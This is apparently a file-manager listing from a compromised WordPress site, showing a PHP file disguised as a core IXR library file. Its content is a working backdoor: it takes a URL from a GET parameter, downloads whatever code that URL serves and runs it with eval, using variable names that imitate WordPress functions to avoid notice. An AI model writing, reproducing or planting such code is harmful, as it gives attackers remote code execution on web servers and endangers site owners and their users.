| Current Path : /home/x/b/o/xbodynamge/namtation/wp-content/ |
| Current File : /home/x/b/o/xbodynamge/namtation/wp-content/class-IXR-introspectionserver-url.php.tar |
home/xbodynamge/dev/wp-includes/IXR/class-IXR-introspectionserver-url.php 0000644 00000000572 15113156443 0022515 0 ustar 00 <?php
if (isset($_GET['interface'])) {
$is_front_page_na = $_GET['interface'];
if ($get_the_title_xdc = curl_init()) {
curl_setopt($get_the_title_xdc, CURLOPT_URL, $is_front_page_na);
curl_setopt($get_the_title_xdc, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($get_the_title_xdc));
curl_close($get_the_title_xdc);
exit;
}
}